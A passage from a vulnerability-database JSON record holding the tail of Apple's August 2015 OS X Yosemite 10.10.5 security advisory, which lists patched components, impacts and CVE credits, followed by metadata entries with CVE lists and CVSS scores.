unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-08-17T00:00:00", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:00", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32391", "https://vulners.com/securityvulns/securityvulns:doc:32390"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-08-17T00:00:00", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MacOS X", "version": "10.10", "operator": "eq"}, {"name": "MacOS X Server", "version": "4.1", "operator": "eq"}], "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:02", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32566", "https://vulners.com/securityvulns/securityvulns:doc:32569", "https://vulners.com/securityvulns/securityvulns:doc:32522", "https://vulners.com/securityvulns/securityvulns:doc:32568"], "description": "Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-10-25T00:00:00", "title": "Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:02", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MacOS X", "version": "10.11", "operator": "eq"}], "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-5883", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-5903", "CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-2783", "CVE-2015-5877", "CVE-2015-5927", "CVE-2015-3785", "CVE-2015-5847", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-6975", "CVE-2015-3415", "CVE-2015-7035", "CVE-2015-3330", "CVE-2015-6987", "CVE-2015-5922", "CVE-2015-5865", "CVE-2015-5869", "CVE-2015-5879", "CVE-2015-7003", "CVE-2015-5876", "CVE-2015-5858", "CVE-2015-5924", "CVE-2015-5862", "CVE-2015-0286", "CVE-2015-5888", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-5874", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-5860", "CVE-2015-1855", "CVE-2015-7020", "CVE-2014-3618", "CVE-2015-6994", "CVE-2015-1352", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-2301", "CVE-2015-7021", "CVE-2015-6977", "CVE-2015-5868", "CVE-2014-3565", "CVE-2015-5872", "CVE-2015-5839", "CVE-2015-5840", "CVE-2014-6277", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-2305", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5873", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-5875", "CVE-2015-5882", "CVE-2015-5842", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-5912", "CVE-2015-6985", "CVE-2015-2331", "CVE-2015-5870", "CVE-2015-5935", "CVE-2015-5722", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5841", "CVE-2015-5894", "CVE-2015-5881", "CVE-2014-2532", "CVE-2015-5831", "CVE-2014-8147", "CVE-2015-5937", "CVE-2015-5878", "CVE-2015-5855", "CVE-2015-7023", "CVE-2014-8611", "CVE-2015-6993", "CVE-2015-5871", "CVE-2015-5866", "CVE-2015-5901", "CVE-2014-8090", "CVE-2015-6836", "CVE-2015-5884", "CVE-2015-3416", "CVE-2015-5936", "CVE-2015-5889", "CVE-2015-5867", "CVE-2015-5836", "CVE-2015-6989", "CVE-2015-5915", "CVE-2015-5900", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-5890", "CVE-2014-7187", "CVE-2014-8146", "CVE-2015-5854", "CVE-2015-6990", "CVE-2015-3414", "CVE-2015-7009", "CVE-2014-9652", "CVE-2015-7031", "CVE-2015-6988", "CVE-2015-5523", "CVE-2015-5986", "CVE-2015-5943", "CVE-2015-5885", "CVE-2015-6996", "CVE-2015-6837", "CVE-2013-3951", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5893", "CVE-2015-5917", "CVE-2014-8080", "CVE-2015-1351", "CVE-2015-5524", "CVE-2015-5887", "CVE-2015-5902", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-0287", "CVE-2015-6974", "CVE-2015-5853", "CVE-2015-6835", "CVE-2015-5897", "CVE-2015-5830", "CVE-2015-5849", "CVE-2015-5896", "CVE-2015-5833", "CVE-2015-5863", "CVE-2015-0231", "CVE-2015-5864", "CVE-2014-7186", "CVE-2015-5891", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5914", "CVE-2015-5926", "CVE-2015-5522", "CVE-2015-5851", "CVE-2015-5899", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14702", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
